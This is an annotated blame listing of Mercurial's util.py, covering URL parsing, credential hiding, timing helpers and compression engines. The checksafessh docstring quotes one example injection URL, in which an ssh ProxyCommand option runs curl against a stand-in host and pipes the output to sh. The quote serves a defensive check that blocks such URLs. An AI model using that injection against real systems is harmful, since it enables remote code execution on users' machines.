r34136 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
Benoit Boissinot
url: store and assume the query part of an url is in escaped form (issue2921)
r14988 'http://user:pw@host:80/?foo=bar&baz=42'
Yuya Nishihara
doctest: replace str() with bytes()
r34136 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
Benoit Boissinot
url: store and assume the query part of an url is in escaped form (issue2921)
r14988 'http://user:pw@host:80/?foo=bar%3dbaz'
Yuya Nishihara
doctest: replace str() with bytes()
r34136 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 'ssh://user:pw@[::1]:2200//home/joe#'
Yuya Nishihara
doctest: replace str() with bytes()
r34136 >>> bytes(url(b'http://localhost:80//'))
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 'http://localhost:80//'
Yuya Nishihara
doctest: replace str() with bytes()
r34136 >>> bytes(url(b'http://localhost:80/'))
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 'http://localhost:80/'
Yuya Nishihara
doctest: replace str() with bytes()
r34136 >>> bytes(url(b'http://localhost:80'))
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 'http://localhost:80/'
Yuya Nishihara
doctest: replace str() with bytes()
r34136 >>> bytes(url(b'bundle:foo'))
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 'bundle:foo'
Yuya Nishihara
doctest: replace str() with bytes()
r34136 >>> bytes(url(b'bundle://../foo'))
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 'bundle:../foo'
Yuya Nishihara
doctest: replace str() with bytes()
r34136 >>> bytes(url(b'path'))
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 'path'
Yuya Nishihara
doctest: replace str() with bytes()
r34136 >>> bytes(url(b'file:///tmp/foo/bar'))
Peter Arrenbrecht
util: make str(url) return file:/// for abs paths again...
r14313 'file:///tmp/foo/bar'
Yuya Nishihara
doctest: replace str() with bytes()
r34136 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
Matt Mackall
merge with stable
r15611 'file:///c:/tmp/foo/bar'
Yuya Nishihara
doctest: use print_function and convert bytes to unicode where needed
r34139 >>> print(url(br'bundle:foo\bar'))
Mads Kiilerich
test: test that backslash is preserved by the url class
r14147 bundle:foo\bar
Yuya Nishihara
doctest: use print_function and convert bytes to unicode where needed
r34139 >>> print(url(br'file:///D:\data\hg'))
Simon Heimberg
util: url keeps backslash in paths...
r20106 file:///D:\data\hg
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 """
if self._localpath:
s = self.path
if self.scheme == 'bundle':
s = 'bundle:' + s
if self.fragment:
s += '#' + self.fragment
return s
s = self.scheme + ':'
Peter Arrenbrecht
util: make str(url) return file:/// for abs paths again...
r14313 if self.user or self.passwd or self.host:
s += '//'
Patrick Mezard
util: fix url.__str__() for windows file URLs...
r15609 elif self.scheme and (not self.path or self.path.startswith('/')
or hasdriveletter(self.path)):
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 s += '//'
Patrick Mezard
util: fix url.__str__() for windows file URLs...
r15609 if hasdriveletter(self.path):
s += '/'
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 if self.user:
timeless
pycompat: switch to util.urlreq/util.urlerr for py3 compat
r28883 s += urlreq.quote(self.user, safe=self._safechars)
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 if self.passwd:
timeless
pycompat: switch to util.urlreq/util.urlerr for py3 compat
r28883 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 if self.user or self.passwd:
s += '@'
if self.host:
if not (self.host.startswith('[') and self.host.endswith(']')):
timeless
pycompat: switch to util.urlreq/util.urlerr for py3 compat
r28883 s += urlreq.quote(self.host)
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 else:
s += self.host
if self.port:
timeless
pycompat: switch to util.urlreq/util.urlerr for py3 compat
r28883 s += ':' + urlreq.quote(self.port)
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 if self.host:
s += '/'
if self.path:
Benoit Boissinot
url: store and assume the query part of an url is in escaped form (issue2921)
r14988 # TODO: similar to the query string, we should not unescape the
# path when we store it, the path might contain '%2f' = '/',
# which we should *not* escape.
timeless
pycompat: switch to util.urlreq/util.urlerr for py3 compat
r28883 s += urlreq.quote(self.path, safe=self._safepchars)
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 if self.query:
Benoit Boissinot
url: store and assume the query part of an url is in escaped form (issue2921)
r14988 # we store the query in escaped form.
s += '?' + self.query
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 if self.fragment is not None:
timeless
pycompat: switch to util.urlreq/util.urlerr for py3 compat
r28883 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 return s
Yuya Nishihara
py3: add utility to forward __str__() to __bytes__()...
r33022 __str__ = encoding.strmethod(__bytes__)
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 def authinfo(self):
user, passwd = self.user, self.passwd
try:
self.user, self.passwd = None, None
Pulkit Goyal
py3: replace str() with bytes()
r31841 s = bytes(self)
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 finally:
self.user, self.passwd = user, passwd
if not self.user:
return (s, None)
Patrick Mezard
http: explain why the host is passed to urllib2 password manager...
r15028 # authinfo[1] is passed to urllib2 password manager, and its
# URIs must not contain credentials. The host is passed in the
# URIs list because Python < 2.4.3 uses only that to search for
# a password.
Patrick Mezard
http: strip credentials from urllib2 manager URIs (issue2885)...
r15024 return (s, (None, (s, self.host),
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 self.user, self.passwd or ''))
Matt Mackall
subrepos: be smarter about what's an absolute path (issue2808)
r14766 def isabs(self):
if self.scheme and self.scheme != 'file':
return True # remote URL
if hasdriveletter(self.path):
return True # absolute for our purposes - can't be joined()
Pulkit Goyal
py3: add b'' to make the regex pattern bytes
r33096 if self.path.startswith(br'\\'):
Matt Mackall
subrepos: be smarter about what's an absolute path (issue2808)
r14766 return True # Windows UNC path
if self.path.startswith('/'):
return True # POSIX-style
return False
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 def localpath(self):
if self.scheme == 'file' or self.scheme == 'bundle':
path = self.path or '/'
# For Windows, we need to promote hosts containing drive
# letters to paths with drive letters.
if hasdriveletter(self._hostport):
path = self._hostport + '/' + self.path
Mads Kiilerich
url: handle file://localhost/c:/foo "correctly"...
r15496 elif (self.host is not None and self.path
and not hasdriveletter(path)):
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 path = '/' + path
return path
return self._origpath
Siddharth Agarwal
util.url: add an 'islocal' method...
r20353 def islocal(self):
'''whether localpath will return something that posixfile can open'''
return (not self.scheme or self.scheme == 'file'
or self.scheme == 'bundle')
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 def hasscheme(path):
return bool(url(path).scheme)
def hasdriveletter(path):
Patrick Mezard
util: fix url.__str__() for windows file URLs...
r15609 return path and path[1:2] == ':' and path[0:1].isalpha()
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076
Mads Kiilerich
util: rename the util.localpath that uses url to urllocalpath (issue2875)...
r14825 def urllocalpath(path):
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 return url(path, parsequery=False, parsefragment=False).localpath()
Sean Farley
util: add utility method to check for bad ssh urls (SEC)...
r33723 def checksafessh(path):
"""check if a path / url is a potentially unsafe ssh exploit (SEC)
This is a sanity check for ssh urls. ssh will parse the first item as
an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
Let's prevent these potentially exploited urls entirely and warn the
user.
Raises an error.Abort when the url is unsafe.
"""
path = urlreq.unquote(path)
Yuya Nishihara
ssh: unban the use of pipe character in user@host:port string...
r33733 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
Sean Farley
util: add utility method to check for bad ssh urls (SEC)...
r33723 raise error.Abort(_('potentially unsafe url: %r') %
Augie Fackler
util: fix unsafe url abort with bytestr() on url...
r36742 (pycompat.bytestr(path),))
Sean Farley
util: add utility method to check for bad ssh urls (SEC)...
r33723
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 def hidepassword(u):
'''hide user credential in a url string'''
u = url(u)
if u.passwd:
u.passwd = '***'
Pulkit Goyal
py3: replace str() with bytes()
r31841 return bytes(u)
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076
def removeauth(u):
'''remove all authentication information from a url string'''
u = url(u)
u.user = u.passwd = None
Pulkit Goyal
py3: return bytes from util.removeauth()...
r37384 return bytes(u)
Idan Kamara
util: add helper function isatty(fd) to check for tty-ness
r14515
Bryan O'Sullivan
util: add a timed function for use during development...
r18736 timecount = unitcountfn(
(1, 1e3, _('%.0f s')),
(100, 1, _('%.1f s')),
(10, 1, _('%.2f s')),
(1, 1, _('%.3f s')),
(100, 0.001, _('%.1f ms')),
(10, 0.001, _('%.2f ms')),
(1, 0.001, _('%.3f ms')),
(100, 0.000001, _('%.1f us')),
(10, 0.000001, _('%.2f us')),
(1, 0.000001, _('%.3f us')),
(100, 0.000000001, _('%.1f ns')),
(10, 0.000000001, _('%.2f ns')),
(1, 0.000000001, _('%.3f ns')),
)
Martijn Pieters
util: create a context manager to handle timing...
r38833 @attr.s
class timedcmstats(object):
"""Stats information produced by the timedcm context manager on entering."""
# the starting value of the timer as a float (meaning and resulution is
# platform dependent, see util.timer)
start = attr.ib(default=attr.Factory(lambda: timer()))
# the number of seconds as a floating point value; starts at 0, updated when
# the context is exited.
elapsed = attr.ib(default=0)
# the number of nested timedcm context managers.
level = attr.ib(default=1)
Martijn Pieters
util: make new timedcmstats class Python 3 compatible
r38848 def __bytes__(self):
Martijn Pieters
util: create a context manager to handle timing...
r38833 return timecount(self.elapsed) if self.elapsed else '<unknown>'
Martijn Pieters
util: make new timedcmstats class Python 3 compatible
r38848 __str__ = encoding.strmethod(__bytes__)
Martijn Pieters
util: create a context manager to handle timing...
r38833 @contextlib.contextmanager
Augie Fackler
util: make timedcm require the label (API)...
r39295 def timedcm(whencefmt, *whenceargs):
Martijn Pieters
util: create a context manager to handle timing...
r38833 """A context manager that produces timing information for a given context.
On entering a timedcmstats instance is produced.
This context manager is reentrant.
"""
# track nested context managers
timedcm._nested += 1
timing_stats = timedcmstats(level=timedcm._nested)
try:
Augie Fackler
util: make timedcm context manager also emit trace events...
r39293 with tracing.log(whencefmt, *whenceargs):
yield timing_stats
Martijn Pieters
util: create a context manager to handle timing...
r38833 finally:
timing_stats.elapsed = timer() - timing_stats.start
timedcm._nested -= 1
timedcm._nested = 0
Bryan O'Sullivan
util: add a timed function for use during development...
r18736
def timed(func):
'''Report the execution time of a function call to stderr.
During development, use as a decorator when you need to measure
the cost of a function, e.g. as follows:
@util.timed
def foo(a, b, c):
pass
'''
def wrapper(*args, **kwargs):
Augie Fackler
cleanup: make all uses of timedcm specify what they're timing...
r39294 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
Martijn Pieters
util: create a context manager to handle timing...
r38833 result = func(*args, **kwargs)
stderr = procutil.stderr
stderr.write('%s%s: %s\n' % (
Martijn Pieters
util: make new timedcmstats class Python 3 compatible
r38848 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
time_stats))
Martijn Pieters
util: create a context manager to handle timing...
r38833 return result
Bryan O'Sullivan
util: add a timed function for use during development...
r18736 return wrapper
Bryan O'Sullivan
util: migrate fileset._sizetoint to util.sizetoint...
r19194
_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
def sizetoint(s):
'''Convert a space specifier to a byte count.
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> sizetoint(b'30')
Bryan O'Sullivan
util: migrate fileset._sizetoint to util.sizetoint...
r19194 30
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> sizetoint(b'2.2kb')
Bryan O'Sullivan
util: migrate fileset._sizetoint to util.sizetoint...
r19194 2252
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> sizetoint(b'6M')
Bryan O'Sullivan
util: migrate fileset._sizetoint to util.sizetoint...
r19194 6291456
'''
t = s.strip().lower()
try:
for k, u in _sizeunits:
if t.endswith(k):
return int(float(t[:-len(k)]) * u)
return int(t)
except ValueError:
raise error.ParseError(_("couldn't parse size: %s") % s)
Bryan O'Sullivan
summary: augment output with info from extensions
r19211
class hooks(object):
'''A collection of hook functions that can be used to extend a
timeless@mozdev.org
spelling: behaviour -> behavior
r26098 function's behavior. Hooks are called in lexicographic order,
Bryan O'Sullivan
summary: augment output with info from extensions
r19211 based on the names of their sources.'''
def __init__(self):
self._hooks = []
def add(self, source, hook):
self._hooks.append((source, hook))
def __call__(self, *args):
self._hooks.sort(key=lambda x: x[0])
FUJIWARA Katsunori
util: enable "hooks" to return list of the values returned from each hooks
r21046 results = []
Bryan O'Sullivan
summary: augment output with info from extensions
r19211 for source, hook in self._hooks:
FUJIWARA Katsunori
util: enable "hooks" to return list of the values returned from each hooks
r21046 results.append(hook(*args))
return results
Mads Kiilerich
util: introduce util.debugstacktrace for showing a stack trace without crashing...
r20244
Augie Fackler
util: format line number of stack trace using %d...
r36146 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
timeless
util: refactor getstackframes
r28497 '''Yields lines for a nicely formatted stacktrace.
Mads Kiilerich
util: add debugstacktrace depth limit...
r31315 Skips the 'skip' last entries, then return the last 'depth' entries.
timeless
util: refactor getstackframes
r28497 Each file+linenumber is formatted according to fileline.
Each line is formatted according to line.
If line is None, it yields:
length of longest filepath+line number,
filepath+linenumber,
function
Not be used in production code but very convenient while developing.
'''
Augie Fackler
util: convert traceback-related sysstrs to sysbytes in getstackframes...
r36147 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
Mads Kiilerich
util: add debugstacktrace depth limit...
r31315 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
][-depth:]
timeless
util: refactor getstackframes
r28497 if entries:
fnmax = max(len(entry[0]) for entry in entries)
for fnln, func in entries:
if line is None:
yield (fnmax, fnln, func)
else:
yield line % (fnmax, fnln, func)
Mads Kiilerich
util: add debugstacktrace depth limit...
r31315 def debugstacktrace(msg='stacktrace', skip=0,
Yuya Nishihara
procutil: move process/executable management functions to new module...
r37136 f=procutil.stderr, otherf=procutil.stdout, depth=0):
Mads Kiilerich
util: introduce util.debugstacktrace for showing a stack trace without crashing...
r20244 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
Mads Kiilerich
util: add debugstacktrace depth limit...
r31315 Skips the 'skip' entries closest to the call, then show 'depth' entries.
By default it will flush stdout first.
timeless
util: reword debugstacktrace comment
r28496 It can be used everywhere and intentionally does not require an ui object.
Mads Kiilerich
util: introduce util.debugstacktrace for showing a stack trace without crashing...
r20244 Not be used in production code but very convenient while developing.
'''
Mads Kiilerich
util: debugstacktrace, flush before and after writing...
r20542 if otherf:
otherf.flush()
Mads Kiilerich
util: strip trailing newline from debugstacktrace message...
r31314 f.write('%s at:\n' % msg.rstrip())
Mads Kiilerich
util: add debugstacktrace depth limit...
r31315 for line in getstackframes(skip + 1, depth=depth):
timeless
util: refactor getstackframes
r28497 f.write(line)
Mads Kiilerich
util: debugstacktrace, flush before and after writing...
r20542 f.flush()
Mads Kiilerich
util: introduce util.debugstacktrace for showing a stack trace without crashing...
r20244
Drew Gottlieb
util: move dirs() and finddirs() from scmutil to util...
r24635 class dirs(object):
'''a multiset of directory names from a dirstate or manifest'''
def __init__(self, map, skip=None):
self._dirs = {}
addpath = self.addpath
if safehasattr(map, 'iteritems') and skip is not None:
for f, s in map.iteritems():
if s[0] != skip:
addpath(f)
else:
for f in map:
addpath(f)
def addpath(self, path):
dirs = self._dirs
for base in finddirs(path):
if base in dirs:
dirs[base] += 1
return
dirs[base] = 1
def delpath(self, path):
dirs = self._dirs
for base in finddirs(path):
if dirs[base] > 1:
dirs[base] -= 1
return
del dirs[base]
def __iter__(self):
Rishabh Madan
py3: use iter() instead of iterkeys()
r31430 return iter(self._dirs)
Drew Gottlieb
util: move dirs() and finddirs() from scmutil to util...
r24635
def __contains__(self, d):
return d in self._dirs
if safehasattr(parsers, 'dirs'):
dirs = parsers.dirs
def finddirs(path):
pos = path.rfind('/')
while pos != -1:
yield path[:pos]
pos = path.rfind('/', 0, pos)
Gregory Szorc
util: create new abstraction for compression engines...
r30350 # compression code
Gregory Szorc
util: declare wire protocol support of compression engines...
r30761 SERVERROLE = 'server'
CLIENTROLE = 'client'
compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
(u'name', u'serverpriority',
u'clientpriority'))
Gregory Szorc
util: create new abstraction for compression engines...
r30350 class compressormanager(object):
"""Holds registrations of various compression engines.
This class essentially abstracts the differences between compression
engines to allow new compression formats to be added easily, possibly from
extensions.
Compressors are registered against the global instance by calling its
``register()`` method.
"""
def __init__(self):
self._engines = {}
# Bundle spec human name to engine name.
self._bundlenames = {}
# Internal bundle identifier to engine name.
self._bundletypes = {}
Gregory Szorc
util: compression APIs to support revlog decompression...
r30798 # Revlog header to engine name.
self._revlogheaders = {}
Gregory Szorc
util: declare wire protocol support of compression engines...
r30761 # Wire proto identifier to engine name.
self._wiretypes = {}
Gregory Szorc
util: create new abstraction for compression engines...
r30350
def __getitem__(self, key):
return self._engines[key]
def __contains__(self, key):
return key in self._engines
def __iter__(self):
return iter(self._engines.keys())
def register(self, engine):
"""Register a compression engine with the manager.
The argument must be a ``compressionengine`` instance.
"""
if not isinstance(engine, compressionengine):
raise ValueError(_('argument must be a compressionengine'))
name = engine.name()
if name in self._engines:
raise error.Abort(_('compression engine %s already registered') %
name)
bundleinfo = engine.bundletype()
if bundleinfo:
bundlename, bundletype = bundleinfo
if bundlename in self._bundlenames:
raise error.Abort(_('bundle name %s already registered') %
bundlename)
if bundletype in self._bundletypes:
raise error.Abort(_('bundle type %s already registered by %s') %
(bundletype, self._bundletypes[bundletype]))
# No external facing name declared.
if bundlename:
self._bundlenames[bundlename] = name
self._bundletypes[bundletype] = name
Gregory Szorc
util: declare wire protocol support of compression engines...
r30761 wiresupport = engine.wireprotosupport()
if wiresupport:
wiretype = wiresupport.name
if wiretype in self._wiretypes:
raise error.Abort(_('wire protocol compression %s already '
'registered by %s') %
(wiretype, self._wiretypes[wiretype]))
self._wiretypes[wiretype] = name
Gregory Szorc
util: compression APIs to support revlog decompression...
r30798 revlogheader = engine.revlogheader()
if revlogheader and revlogheader in self._revlogheaders:
raise error.Abort(_('revlog header %s already registered by %s') %
(revlogheader, self._revlogheaders[revlogheader]))
if revlogheader:
self._revlogheaders[revlogheader] = name
Gregory Szorc
util: create new abstraction for compression engines...
r30350 self._engines[name] = engine
@property
def supportedbundlenames(self):
return set(self._bundlenames.keys())
@property
def supportedbundletypes(self):
return set(self._bundletypes.keys())
def forbundlename(self, bundlename):
"""Obtain a compression engine registered to a bundle name.
Will raise KeyError if the bundle type isn't registered.
Gregory Szorc
util: check for compression engine availability before returning...
r30438
Will abort if the engine is known but not available.
Gregory Szorc
util: create new abstraction for compression engines...
r30350 """
Gregory Szorc
util: check for compression engine availability before returning...
r30438 engine = self._engines[self._bundlenames[bundlename]]
if not engine.available():
raise error.Abort(_('compression engine %s could not be loaded') %
engine.name())
return engine
Gregory Szorc
util: create new abstraction for compression engines...
r30350
def forbundletype(self, bundletype):
"""Obtain a compression engine registered to a bundle type.
Will raise KeyError if the bundle type isn't registered.
Gregory Szorc
util: check for compression engine availability before returning...
r30438
Will abort if the engine is known but not available.
Gregory Szorc
util: create new abstraction for compression engines...
r30350 """
Gregory Szorc
util: check for compression engine availability before returning...
r30438 engine = self._engines[self._bundletypes[bundletype]]
if not engine.available():
raise error.Abort(_('compression engine %s could not be loaded') %
engine.name())
return engine
Gregory Szorc
util: create new abstraction for compression engines...
r30350
Gregory Szorc
util: declare wire protocol support of compression engines...
r30761 def supportedwireengines(self, role, onlyavailable=True):
"""Obtain compression engines that support the wire protocol.
Returns a list of engines in prioritized order, most desired first.
If ``onlyavailable`` is set, filter out engines that can't be
loaded.
"""
assert role in (SERVERROLE, CLIENTROLE)
attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
engines = [self._engines[e] for e in self._wiretypes.values()]
if onlyavailable:
engines = [e for e in engines if e.available()]
def getkey(e):
# Sort first by priority, highest first. In case of tie, sort
# alphabetically. This is arbitrary, but ensures output is
# stable.
w = e.wireprotosupport()
return -1 * getattr(w, attr), w.name
return list(sorted(engines, key=getkey))
def forwiretype(self, wiretype):
engine = self._engines[self._wiretypes[wiretype]]
if not engine.available():
raise error.Abort(_('compression engine %s could not be loaded') %
engine.name())
return engine
Gregory Szorc
util: compression APIs to support revlog decompression...
r30798 def forrevlogheader(self, header):
"""Obtain a compression engine registered to a revlog header.
Will raise KeyError if the revlog header value isn't registered.
"""
return self._engines[self._revlogheaders[header]]
Gregory Szorc
util: create new abstraction for compression engines...
r30350 compengines = compressormanager()
class compressionengine(object):
"""Base class for compression engines.
Compression engines must implement the interface defined by this class.
"""
def name(self):
"""Returns the name of the compression engine.
This is the key the engine is registered under.
This method must be implemented.
"""
raise NotImplementedError()
Gregory Szorc
util: expose an "available" API on compression engines...
r30437 def available(self):
"""Whether the compression engine is available.
The intent of this method is to allow optional compression engines
that may not be available in all installations (such as engines relying
on C extensions that may not be present).
"""
return True
Gregory Szorc
util: create new abstraction for compression engines...
r30350 def bundletype(self):
"""Describes bundle identifiers for this engine.
If this compression engine isn't supported for bundles, returns None.
If this engine can be used for bundles, returns a 2-tuple of strings of
the user-facing "bundle spec" compression name and an internal
identifier used to denote the compression format within bundles. To
exclude the name from external usage, set the first element to ``None``.
If bundle compression is supported, the class must also implement
Gregory Szorc
util: remove compressorobj API from compression engines...
r30359 ``compressstream`` and `decompressorreader``.
Gregory Szorc
util: document bundle compression...
r31792
The docstring of this method is used in the help system to tell users
about this engine.
Gregory Szorc
util: create new abstraction for compression engines...
r30350 """
return None
Gregory Szorc
util: declare wire protocol support of compression engines...
r30761 def wireprotosupport(self):
"""Declare support for this compression format on the wire protocol.
If this compression engine isn't supported for compressing wire
protocol payloads, returns None.
Otherwise, returns ``compenginewireprotosupport`` with the following
fields:
* String format identifier
* Integer priority for the server
* Integer priority for the client
The integer priorities are used to order the advertisement of format
support by server and client. The highest integer is advertised
first. Integers with non-positive values aren't advertised.
The priority values are somewhat arbitrary and only used for default
ordering. The relative order can be changed via config options.
If wire protocol compression is supported, the class must also implement
``compressstream`` and ``decompressorreader``.
"""
return None
Gregory Szorc
util: compression APIs to support revlog decompression...
r30798 def revlogheader(self):
"""Header added to revlog chunks that identifies this engine.
If this engine can be used to compress revlogs, this method should
return the bytes used to identify chunks compressed with this engine.
Else, the method should return ``None`` to indicate it does not
participate in revlog compression.
"""
return None
Gregory Szorc
util: add a stream compression API to compression engines...
r30356 def compressstream(self, it, opts=None):
"""Compress an iterator of chunks.
The method receives an iterator (ideally a generator) of chunks of
bytes to be compressed. It returns an iterator (ideally a generator)
of bytes of chunks representing the compressed output.
Optionally accepts an argument defining how to perform compression.
Each engine treats this argument differently.
"""
raise NotImplementedError()
Gregory Szorc
util: create new abstraction for compression engines...
r30350 def decompressorreader(self, fh):
"""Perform decompression on a file object.
Argument is an object with a ``read(size)`` method that returns
compressed data. Return value is an object with a ``read(size)`` that
returns uncompressed data.
"""
raise NotImplementedError()
Gregory Szorc
util: compression APIs to support revlog compression...
r30794 def revlogcompressor(self, opts=None):
"""Obtain an object that can be used to compress revlog entries.
The object has a ``compress(data)`` method that compresses binary
data. This method returns compressed binary data or ``None`` if
the data could not be compressed (too small, not compressible, etc).
The returned data should have a header uniquely identifying this
compression format so decompression can be routed to this engine.
Gregory Szorc
util: compression APIs to support revlog decompression...
r30798 This header should be identified by the ``revlogheader()`` return
value.
The object has a ``decompress(data)`` method that decompresses
data. The method will only be called if ``data`` begins with
``revlogheader()``. The method should return the raw, uncompressed
Gregory Szorc
global: replace most uses of RevlogError with StorageError (API)...
r39813 data or raise a ``StorageError``.
Gregory Szorc
util: compression APIs to support revlog compression...
r30794
The object is reusable but is not thread safe.
"""
raise NotImplementedError()
Joerg Sonnenberger
ssh: avoid reading beyond the end of stream when using compression...
r38735 class _CompressedStreamReader(object):
def __init__(self, fh):
if safehasattr(fh, 'unbufferedread'):
self._reader = fh.unbufferedread
else:
self._reader = fh.read
self._pending = []
self._pos = 0
self._eof = False
def _decompress(self, chunk):
raise NotImplementedError()
def read(self, l):
buf = []
while True:
while self._pending:
if len(self._pending[0]) > l + self._pos:
newbuf = self._pending[0]
buf.append(newbuf[self._pos:self._pos + l])
self._pos += l
return ''.join(buf)
newbuf = self._pending.pop(0)
if self._pos:
buf.append(newbuf[self._pos:])
l -= len(newbuf) - self._pos
else:
buf.append(newbuf)
l -= len(newbuf)
self._pos = 0
if self._eof:
return ''.join(buf)
chunk = self._reader(65536)
self._decompress(chunk)
Joerg Sonnenberger
util: improve handling of truncated compressed streams...
r39242 if not chunk and not self._pending and not self._eof:
# No progress and no new data, bail out
return ''.join(buf)
Joerg Sonnenberger
ssh: avoid reading beyond the end of stream when using compression...
r38735
class _GzipCompressedStreamReader(_CompressedStreamReader):
def __init__(self, fh):
super(_GzipCompressedStreamReader, self).__init__(fh)
self._decompobj = zlib.decompressobj()
def _decompress(self, chunk):
newbuf = self._decompobj.decompress(chunk)
if newbuf:
self._pending.append(newbuf)
d = self._decompobj.copy()
try:
d.decompress('x')
d.flush()
if d.unused_data == 'x':
self._eof = True
except zlib.error:
pass
class _BZ2CompressedStreamReader(_CompressedStreamReader):
def __init__(self, fh):
super(_BZ2CompressedStreamReader, self).__init__(fh)
self._decompobj = bz2.BZ2Decompressor()
def _decompress(self, chunk):
newbuf = self._decompobj.decompress(chunk)
if newbuf:
self._pending.append(newbuf)
try:
while True:
newbuf = self._decompobj.decompress('')
if newbuf:
self._pending.append(newbuf)
else:
break
except EOFError:
self._eof = True
class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
def __init__(self, fh):
super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
newbuf = self._decompobj.decompress('BZ')
if newbuf:
self._pending.append(newbuf)
class _ZstdCompressedStreamReader(_CompressedStreamReader):
def __init__(self, fh, zstd):
super(_ZstdCompressedStreamReader, self).__init__(fh)
self._zstd = zstd
self._decompobj = zstd.ZstdDecompressor().decompressobj()
def _decompress(self, chunk):
newbuf = self._decompobj.decompress(chunk)
if newbuf:
self._pending.append(newbuf)
try:
while True:
newbuf = self._decompobj.decompress('')
if newbuf:
self._pending.append(newbuf)
else:
break
except self._zstd.ZstdError:
self._eof = True
Gregory Szorc
util: create new abstraction for compression engines...
r30350 class _zlibengine(compressionengine):
def name(self):
return 'zlib'
def bundletype(self):
Gregory Szorc
util: document bundle compression...
r31792 """zlib compression using the DEFLATE algorithm.
All Mercurial clients should support this format. The compression
algorithm strikes a reasonable balance between compression ratio
and size.
"""
Gregory Szorc
util: create new abstraction for compression engines...
r30350 return 'gzip', 'GZ'
Gregory Szorc
util: declare wire protocol support of compression engines...
r30761 def wireprotosupport(self):
return compewireprotosupport('zlib', 20, 20)
Gregory Szorc
util: compression APIs to support revlog decompression...
r30798 def revlogheader(self):
return 'x'
Gregory Szorc
util: add a stream compression API to compression engines...
r30356 def compressstream(self, it, opts=None):
opts = opts or {}
z = zlib.compressobj(opts.get('level', -1))
for chunk in it:
data = z.compress(chunk)
# Not all calls to compress emit data. It is cheaper to inspect
# here than to feed empty chunks through generator.
if data:
yield data
yield z.flush()
Gregory Szorc
util: create new abstraction for compression engines...
r30350 def decompressorreader(self, fh):
Joerg Sonnenberger
ssh: avoid reading beyond the end of stream when using compression...
r38735 return _GzipCompressedStreamReader(fh)
Gregory Szorc
util: create new abstraction for compression engines...
r30350
Gregory Szorc
util: compression APIs to support revlog compression...
r30794 class zlibrevlogcompressor(object):
def compress(self, data):
insize = len(data)
# Caller handles empty input case.
assert insize > 0
if insize < 44:
return None
elif insize <= 1000000:
compressed = zlib.compress(data)
if len(compressed) < insize:
return compressed
return None
# zlib makes an internal copy of the input buffer, doubling
# memory usage for large inputs. So do streaming compression
# on large inputs.
else:
z = zlib.compressobj()
parts = []
pos = 0
while pos < insize:
pos2 = pos + 2**20
parts.append(z.compress(data[pos:pos2]))
pos = pos2
parts.append(z.flush())
if sum(map(len, parts)) < insize:
return ''.join(parts)
return None
Gregory Szorc
util: compression APIs to support revlog decompression...
r30798 def decompress(self, data):
try:
return zlib.decompress(data)
except zlib.error as e:
Gregory Szorc
global: replace most uses of RevlogError with StorageError (API)...
r39813 raise error.StorageError(_('revlog decompress error: %s') %
stringutil.forcebytestr(e))
Gregory Szorc
util: compression APIs to support revlog decompression...
r30798
Gregory Szorc
util: compression APIs to support revlog compression...
r30794 def revlogcompressor(self, opts=None):
return self.zlibrevlogcompressor()
Gregory Szorc
util: create new abstraction for compression engines...
r30350 compengines.register(_zlibengine())
class _bz2engine(compressionengine):
def name(self):
return 'bz2'
def bundletype(self):
Gregory Szorc
util: document bundle compression...
r31792 """An algorithm that produces smaller bundles than ``gzip``.
All Mercurial clients should support this format.
This engine will likely produce smaller bundles than ``gzip`` but
will be significantly slower, both during compression and
decompression.
If available, the ``zstd`` engine can yield similar or better
compression at much higher speeds.
"""
Gregory Szorc
util: create new abstraction for compression engines...
r30350 return 'bzip2', 'BZ'
Gregory Szorc
util: declare wire protocol support of compression engines...
